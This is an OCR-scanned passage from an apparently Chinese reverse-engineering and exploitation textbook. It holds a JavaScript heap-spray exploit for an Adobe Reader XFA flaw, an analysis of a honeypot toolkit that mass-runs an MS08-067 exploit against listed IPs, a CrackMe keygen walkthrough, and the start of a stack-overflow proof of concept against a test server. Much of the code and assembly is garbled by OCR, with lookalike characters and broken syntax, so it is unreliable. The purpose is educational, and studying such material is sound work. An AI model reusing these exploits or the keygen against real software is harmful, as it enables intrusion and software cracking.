var lastWord = HighWord( fakePointor ); 
[]; 


for (var index = 0; index < 40; index++) ( 


var dEFECTIVE 


dEFECTIVE.push( thunk.substring( 0, ((47*2*7*5*2*2*2*2) 
/ 2) - 3) + lastWord + padding ); ) 
AllocateContentArea( cntArea ); 
} 
function Trigger( fakePointor ) { 
AllocateDefectiveNodes( fakePointor ); 
var node — 


xfa.resolveNode ("хҒа [0] .form[0] . Ёогт1 [0] .#радеЅе+ [0] .page1[0] . 
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#subform[0] .field0 [0] .#ui"); 
if ( node == undefined ) { 
return false; 
} 
try { 
node.oneOfChild = choiceListNodes.pop(); 
) 
catch (e) ( 
return false; 
in return true; 
) 
function GO() ( 
app.alert('go'); 
for (var i = 0; i < 5; ++ i) Trigger( gFakePointer ); ) 
function Start() ( for (var index = 549; index >= 1; index--) (var node = 
xfa.resolveNode("xfa[0].form[0].formi[0].£$pageSet[0]. 
pagel[0].£subform[0].field" + index.toString() + "[0].£ui[0]"); 
uiListNodes.push (node); var node - 
xfa.resolveNode ("xfa[0].form[0].forml1[0].$pageSet [0] .pagel[0].$subform[0]. 
field" + index.toString() + "[0].£ui[0].$choiceList[0]"); choiceListNodes. 
push (node) ; } 
xfa.resolveNode ("хҒа [0] .form[0] . Ғогт1 [0] .#subform[0] .гесі1"). 
keep.previous = "contentArea"; 


ggg = app.setTimeOut ("GO();", 500); ) 
var blocks = [];function Spray() { 
var ZERO - DWordToString( 0 ); 
var pTargetEip = DWordToString( gFakePointer + 8 ); 
var blocksize = 0x400000 - 0x38; 
var trunk - pTargetEip; 
trunk += DWordToString( 0x00000001 ); //reference count 
trunk += DWordToString( gTargetEip );  //control eip 
while ( trunk.length < 0x44 / 2 ) trunk += pTargetEip; 


trunk = trunk.substring( 0, 0x44 / 2 ); 
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trunk += ZERO; //[FakePointer + 0x48] = null 


while ( trunk.length < 0х100 / 2 ) trunk += ZERO; 
trunk = trunk.substring( 0, 0x100 / 2 ); 


while ( trunk.length < blocksize / 2 ) trunk += trunk; 


for ( var і = 0; i < 30; ++ i) ( 
blocks.push(trunk.substring(0, (blocksize/2)-2)«*pTargetEip ); 

) 

//spray shellcode 

/* 

trunk - pTargetEip; 

while ( trunk.length < 0x1000 ) trunk += trunk; 


while ( trunk.length < blocksize / 2 ) trunk += trunk; 
for (var і = 0; і < 50; ti) ( 
blocks.push(trunk.substring(0, (blocksize/2)-2)+pTargetEip ); 
) 
NA 


} 


КАЕ Y НЕН ГК ИИ, ААО Web т РУ АО ESRA, XAR 
用 JavaScript 完 成 的 ， 正 浏览 器 多 数 情 况 下 也 是 利用 堆 喷 技术 来 绕 过 ASLR， 其 中 填充 大 量 
内 存 块 喷射 0c0c 的 过 程 也 是 用 JavaScript 完 成 的 。 

至 此 ， 简 单 的 漏洞 分 析 就 完成 了 ， 其 实 这 中 间 包 含 了 成 百 上 千 次 的 反复 调试 ， 对 各 个 
寄存 器 的 值 都 要 有 清醒 的 认识 ， 而 且 这 个 漏洞 还 有 很 多 很 多 细节 没有 跟 大 家 说 明 ， 比 如 指 
针对 象 的 格式 ，esi+44h 布 置 了 什么 东西 ， 感 兴趣 的 读者 可 以 去 网 上 搜索 一 下 。 


82 ”逆向 技术 基础 





8.2.1 逆向 分 析 揭 开 密 钠 中 神秘 工具 的 面纱 


笔者 在 虚拟 机 里 搭建 了 一 个 蜜 把 环境， 现在 确实 已 经 是 千 疮 百 孔 ， 估 计 被 各 种 人 做 
成 了 “肉鸡 ”， 昌 然 设置 了 快照 但 是 一 直 没有 还 原 过 ， 一 直 想 看 看 能 不 能 拿 到 有 价值 的 
exploit。 前 两 天 有 一 个 黑客 在 笔者 的 蜜 缸 里 摆 了 一 个 工具 包 ， 还 设置 了 密码 ， 这 个 工具 包 
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是 付费 的 ， 笔 者 首先 想到 了 0day， 也 许 这 个 黑客 掌握 0day 呢 ， 于 是 笔者 果断 把 工具 包 拿 了 
出 来 逆向 分 析 了 一 下 。 

工具 包 里 是 一 个 需要 输入 密码 的 exe， 不 多 说 直接 放 到 OllyDbg 里 跑 一 下 看 看 能 不 能 得 
到 密码 ， 程 序 入 口 直接 是 Pushad， 按 F8 键 单 步 执行 几 步 之 后 就 直接 返回 了 ， 于 是 首先 想到 
的 是 加 壳 ， 放 到 PEiD 里 看 一 下 《〈 见 图 8-30) 。 

果然 是 加 过 了， 还 好 是 UPX 壳 ， 现 在 脱 UPX 壳 的 脱 壳 机 可 以 轻易 搜索 和 下 载 ， 就 不 讲 
手动 脱 壳 的 过 程 了 ， 将 UPX 壳 脱 掉 之 后 再 用 PEiD 跑 一 下 看 看 〈 见 图 8-31) 。 











































































































入 口 点 : (ою | FP o wx D) ^B: D0001000 IB [code GJ 

文件 偏 移 : 506004580 — | 首 字 节 : ”EDEE ISO | [>] ZRS: 50000400 — | "OF.  Beccono | O) 

连接 器 版 本 : 区 55 ] FRR: Nin console (2) 连接 器 版 本 : .50 子 系统 : — Min32 console (2) 

РЯ + 

多 文件 扫描 an | (веже o) [ 选项 @) ] [ 关于 邮 ) 退出 Каш (cet 选项 @) ATO) 

М 总 在 最 前 G) m maa) (2 站 — тз => 
图 8-30 ”PEiD 显 示 加 壳 情 况 图 8-31 UPX 脱 壳 后 PEiD 显 示 情 况 


EP 段 的 值 是 .code 说 明 UPX 壳 已 经 正常 脱 掉 ， 将 脱 壳 后 的 程序 放 到 OllyDbg 里 跑 起 来 ， 
刚 开始 这 个 程序 只 是 从 寄存 器 读 取 了 一 些 参数 ， 直 接 按 F9 键 让 程序 完全 跑 起 来 。 

经 过 反 汇 编 调 试 ， 可 以 看 到 这 个 程序 跑 起 来 后 在 C 盘 下 的 一 个 隐藏 一 个 目录 里 创建 了 
名 为 1.tmp 的 文件 夹 ( 见 图 8-32〉 ， 同 时 创建 了 一 个 名 为 01.bat 的 脚本 ， 然 后 它 将 这 个 脚本 
运行 了 起 来 。 接 下 来 我 们 到 C 盘 下 的 这 个 目录 里 看 看 这 个 脚本 的 内 容 〈 见 图 8-33) 。 


Н Q) CD C: Documents. and Settings\Adainistrator\Local Settings\Teap\1. tap 








图 8-32 ”隐蔽 目录 下 创建 的 脚本 


[Tu 


| XM аъ хо #жу мю 
|Gecho off 
ч. 





titie 出 售 名 种 发 包 , 通 杀机 器 需要 的 联系 q: 


hi L3 hi 
Set /р var- 册 人名 各 发 包 . 通 亲 机 器 BENRA amao GT ИАЛ", 
if "Avarg"-2"529. joto end 
sa BABERE qq: 
ses start 
zend 
[cis 


|echo vB - "" - ”作者 aq， 提示 ， SBER 
eecho off 
|for /Е $*i in (ips.txt) do (start 02.bat 22i) 


图 8-33 ”隐蔽 目录 下 脚本 内 容 
简单 看 一 下 这 个 脚本 的 内 容 ， 其 中 %var% == "520." 的 if 语 句 中 暴露 了 这 个 程序 的 密 
码 ，in (ips.txt) do (start 02.bat %%i) 说 明 当 密码 判断 成 功 后 ， 将 对 ips.txt 中 保存 的 人 P 
地 址 执行 02.bat 脚 本 。 现 在 马上 打开 02.bat 脚 本 ， 看 看 脚本 的 内 容 〈 见 图 8-34) 。 
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图 8-34 ”跟踪 生成 的 02.bat 脚 本 
从 图 8-34 可 以 看 到 这 个 脚本 在 执行 cs.exe 文 件 ，%1 是 它 的 参数 ，nc 就 是 常见 的 nc 链接 
工具 。 直 接 输 入 520. 密 码 ， 来 看 看 这 个 工具 的 作用 〈 见 图 8-35) 。 


C:\VINDOS\systea32\cad. ехе ~ 02.bat 121 
C; WINDOWS VrystenJZ cmd. exe ~ 02. 
DUAE 














图 8-35 ”工具 追踪 
至 此 ， 这 个 所 谓 的 收费 工具 的 真面目 全 部 显示 了 出 来 ， 原 来 就 是 emm 大 牛 在 2008 年 写 
的 MS08067 的 exploit， 这 个 收费 工具 现在 网 上 随处 可 见 ， 其 实 就 是 写 了 个 批量 的 脚本 ， 并 
没有 什么 0day。 





8.2.2 ”从 CrackMe 到 逆向 破解 技术 


CrackMe 其 实 是 一 些小 程序 ， 公 开 给 别人 尝试 破解 ， 编 写 CrackMe 的 人 可 能 是 程序 
、 黑 客 等 ， 他 们 可 能 是 为 了 验证 自己 的 程序 安全 性 ， 也 可 能 为 了 挑战 其 他 黑客 的 水 平 ， 
最 终 形成 了 破解 技术 中 CrackMe 的 独特 文化 。CrackMe 简 称 CM， 也 存在 CM 竞赛 形式 ， 多 
见于 一 些 论坛 。 

接 下 来 ， 通 过 对 一 个 CrackMe 破 解 过 程 的 分 析 ， 加 深 读者 对 破解 技术 的 理解 ， 该 
CrackMe 如 图 8-36 所 示 。 





m 




















pe 887 == 
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图 8-36 来 自 看 雪 论 坛 发 布 的 Crackme-160.chm 
首先 运行 一 次 CrackMe， 是 一 个 普通 的 序列 号 程序 。 
注 : 这 个 CrackMe 的 作者 有 点 偷懒 了 ， 上 面 那 行 相当 于 输入 ， 下 面 那 行 是 需要 算 的 序 
列 号 ， 如 图 8-37 所 示 。 








图 8-37 ”程序 界面 
首先 用 PEiD 检 查 一 下 ， 结 果 如 图 8-38 所 示 。 


File: C:\Documents and Settings| YA (ID Brad Soblesky.2,exe 





: 00001Е00 EP Section: ,text 
File Offset: 00001Е00 First Bytes: Б5,88,ЕС,6А [>] 
Linker Info: Б.0 Subsystem: Win32 GUI [>] 





Microsoft Visual C++ 6.0 
Mukti Scan | | Taskvewer | | Options | | ax | Ex 
IV Stay ontop [m] >] 
图 8-38 ”PEiD 查 询 结果 
从 图 8-38 中 可 以 看 到 ， 这 是 一 个 没有 过 的 程序 ， 用 VC++ 6.0 编 译 。 
首先 要 找到 计算 序列 号 的 部 分 ， 既 然 没 有 壳 我 们 就 可 以 直接 用 OD 载 入 。 
这 个 程序 下 断 点 的 方法 很 多 ， 这 里 举 几 个 例子 。 


1. 查找 参考 字符 串 ( 见 图 8-39 ) 





"isa" 
Aso" 
"CrackMe 

ser Name must have at least S characters." 


ncorrect*t, Try Again.” 
orrect way to go, You Got It." 


90401F75| push 0x10000 








图 8-39 ”查找 参考 字符 串 
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从 图 8-39 可 以 看 到 “User Name must have at least 5 characters.” “Correcrt way to go, 
You Get It.”“Correct!” 这 几 个 比较 可 疑 的 字符 串 ， 对 每 个 附近 的 代码 简单 跟踪 分 析 一 下 


就 能 找到 关键 跳 转 的 位 置 ， 这 里 不 再 蒙 述 。 
经 分 析 可 知 ， 计 算 序 列 号 的 代码 在 这 部 分 ， 如 图 8-40 所 示 。 






04015DC| |8040 EC lea ecx,duord ptr ss 





p-tetu] 


























Call Brad_Seb -9Buat19 
mousx edx,al 
904015E7| | 8055 FG mov eax,duord ptr ss:[ebp-8x10] 
994615Eh| | Gaca add eax,edx 
MASEC| |8945 Еи mou dword ptr 55: [ерр-8х18] „вах. 
005015EF| |8840 EQ mov ecx,dword ptr ss:[ebp-0X201 
04015F2| | C1E1 вв Shl ecx,0<9 
9855 FO mou edx,duord ptr «s-[ehp-txtü] 
3301 xor eüx.eck 
бөһютбга| |8955 FO mov dword ptr ss:[ebp-Bx10] ,edx 
900015FD| |8845 EG mov eaxvdword ptr ss:[ebp-8x20] 
поцотвоз| | азса 01 add вах. fct 
00101003] |8840 EA mov ecx,dword ptr ss:[ebp-8xic] 
в0461606| | OFAFAD EQ imul ecx,dvord ptr ss:[ebp-0x20] 
вопе160д| | F701 not ecx 
ga6169C| | UFRFCY imul eax.ecx 
0040160F| | 8855 FG mov edxvdword ptr ss:[ebp-8x10] 
90101612 | ӨЕПЕРО imul edx,eax 
BAf1615| | 8955 FR mou dword ptr ss:[ehp-Bx19] ,edx 
00501618|` EB Ар jm short Brad SoD.804015t7 


图 8-40 БСК ( 序列 号 计算 部 分 ) 


2. API 断 点 


pa pagg ка iT | 
5|. t9 гевтоваз 
eur” C7ns єв воввво 
98881555|。EB we jm» short Brad So 
5050157 „8895 to то» edxvduord ptr 
sonetsca| [эзгә 01 add edx Gx1 
пашисто | 8955 FÜ то» duard pte ss: [eh а 
00401500) | 8845 EQ то» еах,шизго ptr ss ' 
004015D9| | 3085 EA ©ту eax dword ptr ss 
втв |. | 70 а? ju» short Brad соь. -98N91619 
Ba81508| | нвар єв mou ecx ,dword ptr ss:[ebp-0x20] 
00401508| [5t push ecx 








尝试 使 用 GetDlgItemTextA、GetMessageA、GetMessageW 等 API， 随 意 输 入 一 个 
name， 单 击 Check 验 证 ， 程 序 成 功 在 GetMessageA 处 断 下 。 然 后 按 Ctrl+F9 组 合 键 返回 ， 找 
到 程序 领空 内 调用 的 代码 ， 向 下 寻找 验证 部 分 ， 或 者 按 Alt+K 组 合 键 打开 堆栈 调用 窗口 


〈 见 图 8-41) 。 


hwnd = 88080150 (class-'Edit',par 
Buffer = 00383038 


Count = 0x9 


0012F6DC | 00401556|? «jnp.&HFCh2. 83097» 


图 8-41 


果 如 图 8-42 所 示 。 


8848107Е|- FF25 48314009 |jnp dword ptr ds:[<&MFC42. 
80581085|- FF25 4C314888 |jnp dword ptr ds:[X&MFCh2. 
80581D88|- FF25 50315888 | jmp dword ptr ds:[X&MFCh2. 
00581090|- FF25 54314808 | jmp dword ptr ds:[<&MFC42. 


na&ninnz| ccoc coo4nnnn | ics asawa nte dc-P/9MEPLO 


图 8-42 ”跟踪 代码 





调用 堆栈 窗口 
从 图 8-41 中 可 以 看 到 程序 领空 内 调用 堆栈 的 函数 地 址 为 00401556， 双 击 跟 入 ， 结 


mfch2.73D8DRBF 


Brad Sob.00501551 
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从 图 8-42 中 可 以 发 现 编译 器 罗列 的 API 的 入 口 ， 接 下 来 可 以 按 Ctrl+R 组 合 键 查找 调用 
这 段 代 码 的 参考 〈 见 图 8-43) 。 


加 567 Brad Sob:.text 于 00401D8A 


00401551 |са11 «jmp.&MFCA2.43097» 
00401565 call «jmp.&MFCA2.43097» 
00161088 | jmp dword ptr 05: [<8МЕСА2 130975] (初始 ceu 选择 











图 8-43 ”查找 参考 
分 别 跟 入 两 个 call 语 句 ， 分 析 附 近代 码 可 知 在 第 2 个 call 语 句 下 面 的 是 验证 序列 号 的 
程序 。 
找到 计算 序列 号 的 代码 之 后 ， 我 们 在 计算 处 上 方 及 中 途 下 断 点 ， 如 图 8-44 所 示 。 









BGO4015C5 jmp short Brad_Sob .694915D9 
p8B55 EG mou edx,dword ptr ss:[ebp-0x20] 

004015CA 83C2 01 add edx,0x1 

8646015CD| | 8955 ЕВ mou dword ptr ss:[ebp-0x20],edx 

08401508| | 8845 ЕВ mou eax,dword ptr ss:[ebp-0x20] 

00401503 3B45 EN cmp eax,dword ptr ss:[ebp-0x1C] 

805015D6|.,| 7D 42 jge short Brad Sob.6056161R 

00401508) | 8BhD EG mou ecx,dword ptr ss:[ebp-80x20] 
51 push ecx 

805815DC 8D4D EC lea ecx,duord ptr ss:[ebp-8x1^] 

805015DF E8 1C030000 call Brad Sob.0058019068 

805015E^ BFBEDG mousx edx,al 

8B45 FG mou eax,dword ptr ss:[ebp-0x10] 

805015ER 93c2 add eax,edx 

B85015EC| | 8945 FB mou dword ptr ss:[ebp-0x10],eax 

80546015EF 8BhD EG mou ecx,dword ptr ss:[ebp-80x28] 

805015F2 C1E1 08 shl ecx,8x8 

885015F5| | 8B55 FO mou edx,dword ptr ss:[ebp-0x18] 

8856015F8| | 3301 xor edx,ecx 

004015FA 8955 FO mou dword ptr ss:[ebp-0x10],edx 

004615FD| | 8Bh5 ЕВ mou eax,dword ptr ss:[ebp-8x28] 

80501608 83C8 01 add eax,60x1 

80501683 8BhD E4 mou ecx,dword ptr ss:[ebp-8x1C] 

88581686 8FRFhD EG imul ecx,dword ptr ss:[ebp-8x28] 

60406160A F7D1 not ecx 

0040160C| | GFAFC1 imul eax,ecx 

06040160F 8B55 FÜ mou edx,dword ptr ss:[ebp-8x18] 

80501612 BFAFDG imul edx,eax 

88581615 8955 F8 mou dword ptr ss:[ebp-8x18],edx 

865601618|^-EB AD jnp short Brad Sob.805815C7 

80406161A 8B45 FÜ mou eax,duord ptr ss:[ebp-8x18] 

















8-44 іг 
简单 阅读 代码 可 以 发 现 ， 程 序 用 循环 来 计算 序列 号 ， 假 设 程序 需要 根据 每 位 输入 的 字 
符 来 计算 〈 其 实 的 确 是 这 样 ) ， 所 以 可 以 把 断 点 下 在 循环 的 首部 ， 然 后 输入 有 规律 的 数据 
(比如 这 里 笔者 输入 的 是 abcdefg， 之 所 以 要 这 样 做 是 为 了 找到 程序 在 哪里 是 否 读 入 每 位 
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字符 ) ， 单 击 Check 按 钮 让 程序 断 下 ， 分 析 代码 后 可 以 得 到 这 些 关键 位 置 〈《 见 图 8-45) 。 








004015С5/, EB 09 jmp short Вғад ор .88181508 
78855 ЕВ поо edx,dword ptr ss:[ebp-8x20] 

985015CR 83C2 81 add edx,6x1 

005015CD| | 8955 EG mou dword ptr ss:[ebp-0x28],edx [ebp-8x28] 保 存 当 前 计算 到 的 位 数 

00401500| | SBh5 EB mou eax,dword ptr ss:[ebp-0x20] 

005015D3| | 3Bh5 EN cmp eax,dword ptr ss:[ebp-0x1C] [ebp-8x1C] 保 存 nane 总 长 

005015D6|.| 7D 42 jge short Brad_Sob.8848161A 

90401508] | 8B4D ЕВ поо ecx,dword ptr ss:[ebp-8x20] 
51 push ecx 

005015DC| | 8D4D EC lea ecx,dvord ptr ss:[ebp-üx1A] 

9050150F| | ЕВ 1030000 [call Brad Sob.00501900 

004015E4| | OFBEDO mousx edx,al 

OUE sess Fe mou eax,dword ptr ss:[ebp-0x10] [ebp-8x19] 保 存 当前 计算 的 密码 // 初 始 密码 为 8x81276345 

805015ER 9зс2 add eax,edx 

005015EC| | 8945 FO поо dword ptr ss:[ebp-0x10],eax 

004015ЕҒ| | 8B4D EO nou ecx,duord ptr ss:[ebp-0x20] 

9004015F2| | C1E1 08 Shl ecx, 0x8 

004015F5| | 8855 FO mov edx,dword ptr ss:[ebp-8x18] 

004015Е8| | 3301 xor edx,ecx 

004015Еа| | 8955 FO mou dword ptr ss:[ebp-0x10],edx 

004015FD| | 8В45 ЕВ nou eax,dword ptr ss:[ebp-0x20] 

900501600| | 83C0 01 add eax,0x1 

8001603) | 8B4D EN nou ecx,dword ptr ss:[ebp-0x1C] 

900501606| | 0FRFAD EG imul ecx,dword ptr ss:[ebp-0x20] 

900401600] | F7D1 not ecx 

9050160C| | OFAFC1 imul eax,ecx 

0040160Ғ| | 8855 FO mou edx,dword ptr ss:[ebp-6x10] 

90501612| | OFAFDO imul edx,eax 

8001615] | 8955 FO поо dword ptr ss:[ebp-0x10],edx 

08401618 |^ ЕВ ñD јар short Brad Sob.80h015C7 

80401610] 8845 F оо duord ptr ss:[ebp-0x1 














图 8-45 ”关键 变量 注释 
接着 ， 根 据 分 析出 的 地 址 对 应 的 变量 写 出 注册 机 的 计算 代码 〈 这 里 笔者 选择 使 用 
C/C++ 来 编写 注册 机 ， 因 为 C/C++ 提供 了 _asm 这 一 关键 字 ， 所 以 可 以 方便 地 用 汇编 来 实 
现 ， 简 化 了 编写 注册 机 的 难度 ) 。 


char name[100]; // 用 来 保存 输入 的 name 
long key; // 用 来 保存 计算 中 的 密码 
int len; // 用 来 保存 name 长 度 ( 测试 时 方便 改变 循环 次 数 来 调试 每 一 步 得 到 的 密码 ) 
std::cin»»name»»len; 
key-2166842181; // 为 key 赋 初始 值 0x81276345 对 应 的 十 进 制 
for(int i=0;i<len;i++) 
{ 
char m; // 用 来 保存 每 位 计算 的 字符 
m=name[i]; 
asm 
t 
movsx edx,m 
mov eax,key 
add eax,edx 
mov key,eax 
mov ecx,i 


shl есх, 0х8 


== ми == 


ANSA. sasea, 


mov edx,key 
xor edx,ecx 
mov key,edx 
mov eax,i 
add еах, 0х1 
mov есх,1ех 
imul ecx,i 
not ecx 

imul eax,ecx 
mov edx,key 
imul edx,eax 


mov key,edx 


} 
std::cout<<key; 


通过 上 面 的 代码 可 以 看 出 ， 输 出 的 key 还 不 是 最 终 的 密码 ， 可 以 用 循环 最 后 一 次 保存 的 
密码 来 验证 计算 的 结果 正确 与 否 〈 这 里 用 来 测试 的 name 是 12345678) ， 结 果 如 图 8-46 所 示 。 

-1786453832 的 十 六 进 制 双 字 的 值 就 是 9584E0B8， 所 以 到 这 里 的 计算 是 正确 的 。 

那么 为 什么 计算 的 结果 不 是 正确 的 密码 呢 ， 继 续 F8 单 步调 试 程序 ， 如 图 8-47 所 示 。 























~ EB AD jap short Brad_Sob.004015C7 
8945 ҒО mov eax,duord ptr ss:[ebp-0x10] 
58 push еах 推 入 了 密码 
68 S^04000 (push Brad_Sob. 00404054 ASCIL "ilu" 
80D DC lea ecx,dword ptr ss:[ebp-0x2A] 
51 push ecx 
єз 52070000 — call <jmp -ahFCa2-#28187 在 这 里 eax,ecx 改 次 丁 
взса 0С add esp, 0xC 

lea ecx,duord ptr ss:[ebp-0x24] 
ЕЗ 79020900 |са11 Brad Sob.00401880 
58 push еах 
804D ЕВ lea ecx,duord ptr ss:[ebp-0x18] 
ER яаа?аава — |call Brad аһ .авһеяа 
в5с0 test eax,eax 
. O85 FF000000 | jnz Brad Sob.00h01747 Lor 

8080 ACFEFFFF |lea ecx,dword ptr ss:[ebp-0X 
ЕЗ 19870008 [call Cjmp.tMFCA2.25A0» -| 关键 跳 转 
Cóas FC 03 nou byte ptr ss:[ebp-0x4], 0x3 

4 ба 66 push 0х66 

z F ñ = 

图 8-46 ”测试 注册 机 ( 失败 ) 图 8-47 计算 序列 号 后 代码 


在 执行 完 call<jmp.&MFC42.#2818> 语 句 后 ，ecx 和 eax 值 均 被 改变 了 ， 而 且 ecx 存 储 的 
值 经 测试 就 是 name 对 应 的 正确 密码 。 由 此 可 以 确定 call<jmp.&MFC42.#2818> 内 的 代码 计 
算出 了 密码 。 

通过 OD 提供 的 call 的 函数 名 可 以 看 出 来 ， 这 是 一 个 MFC 封 装 的 函数 ， 因 为 缺少 
MFC42.DLL 的 符号 表 ， 所 以 OD 没有 把 对 应 的 函数 名 告诉 我 们 。 

这 里 可 以 使 用 IDA Pro 自 动 下 载 所 需 的 符号 表 〈 也 可 以 手动 搜索 pdb 文件 ) 来 找到 对 应 
函数 ， 把 CrackMe 扔 到 IDA Pro 中 ， 跳 转 到 0x00401642 的 位 置 ， 如 图 8-48 所 示 。 
由 此 可 见 这 个 函数 是 CString::Format 函 数 ， 压 入 的 参数 分 别 是 call 前 3 个 push 中 的 前 2 个 
(第 3 个 push 的 是 返回 地 址 ，VC 6.0 编 译 出 的 程序 调用 函数 时 先 用 ecx 保 存 地 址 ， 然 后 压 入 
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堆栈 ) 。 
mou eax, [еһр+уак_18] 
push еах 
push offset aLu ; "10и" 
lea ecx, [ебр+џа“ 24] 


push ecx 

?Format&CString&eQaAXPBD22 ; CString::Format(char const x*,...) 
dd esp, 
lea ecx, [ebp*«var 24] 


call unknoun libname 7 ; Microsoft UisualC 2-18/net runtime 
; МЕС 3.1-18.8 32bit 
push eax 


lea ecx, [ebp*var 18] 
call sub ^818C8 
test еах, eax 








loc 581757 
图 8-48 ”加 载 符号 表 后 的 代码 注释 
其 实 有 使 用 MFC 经 验 的 程序 员 应 该 早已 猜 出 来 call 要 实现 的 功能 ， 因 为 call 前 压 入 了 一 
个 常量 参数 “%lu” 是 16 进 制 数 的 标识 。 
于 是 ， 在 注册 机 代码 下 添加 如 下 代码 : 


Cstring str; 
str.Format( T("$1u"),key); 
Std:wcout««LPCTSTR (str); 


测试 结果 如 图 8-49 所 示 。 





图 8-49 ”验证 注册 机 
可 以 看 到 ， 得 到 了 正确 密码 ， 破 解 成 功 。 


8.2.3 多 语言 配合 完成 exploit 


接 下 来 笔者 将 通过 对 一 个 程序 的 逆向 分 析 ， 讲 解 C 语 言 、 汇 编 语 言 、CMD 命 令 等 如 何 
协同 合作 ， 来 完成 从 漏洞 挖掘 到 分 析 ， 再 到 写 入 恶意 代码 ， 最 后 完成 对 一 个 目标 计算 机 的 
exploit 过 程 。 

笔者 有 一 个 朋友 写 了 一 个 有 漏洞 的 程序 ， 模 拟 的 是 一 个 网 络 服务 。 大 家 都 知道 ， 在 运 
行 一 些 网 络 服务 的 时 候 ， 会 在 计算 机 中 开启 一 个 端口 ， 用 这 个 端口 来 监听 同样 在 互联 网 上 
执行 这 个 网 络 服务 的 其 他 计算 机 发 来 的 交互 信息 ， 就 好 像 3389、445 这 些 端口 一 样 ， 由 于 
这 个 程序 存在 漏洞 ， 正 好 可 以 拿 这 个 程序 ， 在 虚拟 机 中 配置 的 环境 下 运行 一 下 看 看 〈 见 图 
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8-50) 。 





8-50 ”Server 程 序 运行 情况 
程序 成 功 运行 起 来 了 ， 它 其 实 是 一 个 模拟 的 网 络 服务 ， 既 然 是 网 络 服务 ， 可 以 看 看 端 
口 的 开放 情况 ， 在 CMD 下 用 netstat -an 查看 结果 如 图 8-51 所 示 。 


Documents and Settings\hdministrator>net 





Connections 


Local ñddres Foreign ñddress State 
@.й.й.й:й LISTENING 
@.й.й.й:й LISTENING 
СААГАН) 


图 8-51 Server 程 序 运行 后 端口 情况 
果然 程序 开放 了 7777 端 口 ， 这 个 正在 监听 的 端口 其 实 就 是 这 个 正在 运行 的 网 络 服务 开 
启 的 。 接 下 来 看 看 这 个 程序 的 功能 ， 先 正 向 反 汇编 一 下 ， 看 看 程序 是 如 何 运行 的 。 用 IDA 
Pro 打 开 程序 ， 直 接 按 F5 查 看 伪 代 码 ( 见 图 8-52〉。 


t 








cdecl maintint *wenup) 
SOCKET v3; // eaxB1 

SOCKET và; // ebpe1 

void ж05; // eax82 

void #06; // eax&5 

SOCKET v7; // ebxB6 

void «08; // eaxB6 

void *u9; // eaxB6 

void *»v10; // eaxB6 

int v11; // esi@7 

void *v12; // eaxB8 

void *u1h; // eax811 

struct sockaddr name; // [sp*hh] [bp-3Bhh ]GA 
struct sockaddr addr; // [sp*1hh] [bp-36hh]&6 
char v17; // [sp*28h] [bp-390h]87 

struct WSñData WSfData; // [sp*228n] [bp-1990h]G1 











WSAStartup( Gx101u, &USAData); | 
v3 = socket(2, 1, 0 
vh = v3; 

if ( (signed int)u3 < 8 ) 





ostream operator (v3); 

ostream operator ("socket creating errort*"); 

05 = (void *)ostream operator (18); 

sub à812B8(u5, (void ( cdecl *)( DWUORD))sub 3012080); 
exit(1); 


) 
*( WORD *)&name.sa data[2] = 2; 
*( WORD *)&name.sa data[^] = htons(8x1E61u) ; 
*( DWORD *)&name.sa data[6] = htonl1(8); 
if ( bind(v^, (struct sockaddr x)((char x)&name + 8), 16) ) 
Н 
ostream operator ("binding stream socket errort"”); 
vő = (void «)ostream operator (18); 


图 8-52 ”Server 程 序 反 汇编 伪 代 码 
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从 图 8-52 可 以 看 到 ， 其 实 就 是 用 常规 的 Socket 建 立 套 接 字 进行 交流 ， 用 WSAStartup 初 始 
化 ， 然 后 畸形 了 一 些 bind、listen 等 对 人 p 端 口 的 监听 ， 但 是 这 里 需要 关注 一 些 重点 的 操作 (ML 
图 8-53) . 

图 8-53 这 里 htons 后 面 的 0x1E61u， 如 果 将 十 六 进 制 转换 成 十 进 制 就 是 7777， 其 实 这 里 
就 是 对 端口 的 复制 ， 也 就 相当 于 C 语 言 中 的 sockaddrsin_port 操 作 〈 见 图 8-54) 。 
M 








memset(&u17, 8, 0x200u); 
v11 = recu(u7, &u17, 512, 0); 
if (v11« 8) 





*( WÜRD x)&name.sa data[^5] = htons(8x1lE61u); 
*( DWORD x)&name.sa data[6] = htonl(8); 








图 8-53 ”Server 程 序 反 汇编 分 析 图 8-54 ”Server 程 序 反 汇编 分 析 
紧 接着 可 以 看 到 recv 了 ， 这 是 Socket 方 法 中 最 为 重要 的 一 个 函数 ， 按 照 MSDN 中 的 描 
述 ，v7 是 套 接 字 名 称 ，v17 是 接收 的 数组 ，512 是 数组 大 小 ， 这 个 程序 会 监听 传 到 这 个 端口 
上 的 数组 ， 接 下 来 要 关注 一 下 这 个 数组 了 〔( 见 图 8-55〉。 
sub 401000 这 个 函数 调用 了 v17 这 个 数组 ， 直 接 跟 进 这 个 函数 里 看 看 代码 SENI 56) . 


*u2; // eax@1 


*03; // еах@1 
жоц; // eax@1 


r v5; // [sp*8h] [bp-C8h]&1 
У 
sub 5^6801888(&u17); strcpy(&u5, a1); 


图 8-55 ”Server 程 序 反 汇编 分 析 图 8-56 ”Server 程 序 漏洞 定位 
第 一 个 看 到 的 就 是 strcpy 函 数 ， 可 以 初步 认为 漏洞 发 生 在 这 里 ， 漏 洞 挖掘 最 为 重要 的 
是 对 strcpy 敏 感 ， 因 为 大 多 数 的 栈 滋 出 都 会 发 生 在 这 个 函数 中 。 假 设 笔者 复制 目标 的 bu 位 
大 小 为 8Byte， 而 笔者 对 于 al 的 大 小 并 没有 进行 严格 检查 ， 就 会 造成 栈 溢出 ， 这 里 不 多 介 
绍 ， 经 过 这 一 段 的 分 析 ， 可 以 初步 考虑 POC 程 序 怎么 写 ， 也 就 是 说 ， 要 建立 一 个 与 这 个 
IP、 端 口 的 通信 ， 然 后 发 送 一 个 畸形 字符 串 到 这 个 也 和 这 个 端口 上 ， 如 果 程 序 崩 溃 说 明 漏 
洞 真 的 存在 。 是 笔者 写 的 程序 的 关键 算法 如 图 8-57 所 示 。 








if(WSRStartup(MRKEWORD(2,2),&wsapata)) 
‹ 


printf("Socket Init"); 
return 8; 


› 

Target_IP = argu[1]; 

Target Port = argu[2]; 

target socket.sin Family = AF_INET; 

target socket.sin addr.S un.S addr = inet addr(Target IP); 
target socket.sin port = htons(atoi(Target Port)); 

5 = socket(RF IMET,SOCK STRERM,8); // 建 立 套 


ET 
if(connect(s,(struct sockaddrs)&target_socketvsizeof(target_socket))K9)// 建 立 与 目标 IP 和 端口 的 连接 


printf (ERER; 
closesocket(s); 
wsRCleanup(); 
return 0] 


Анес “和 连接 成 功 ?\n"); 

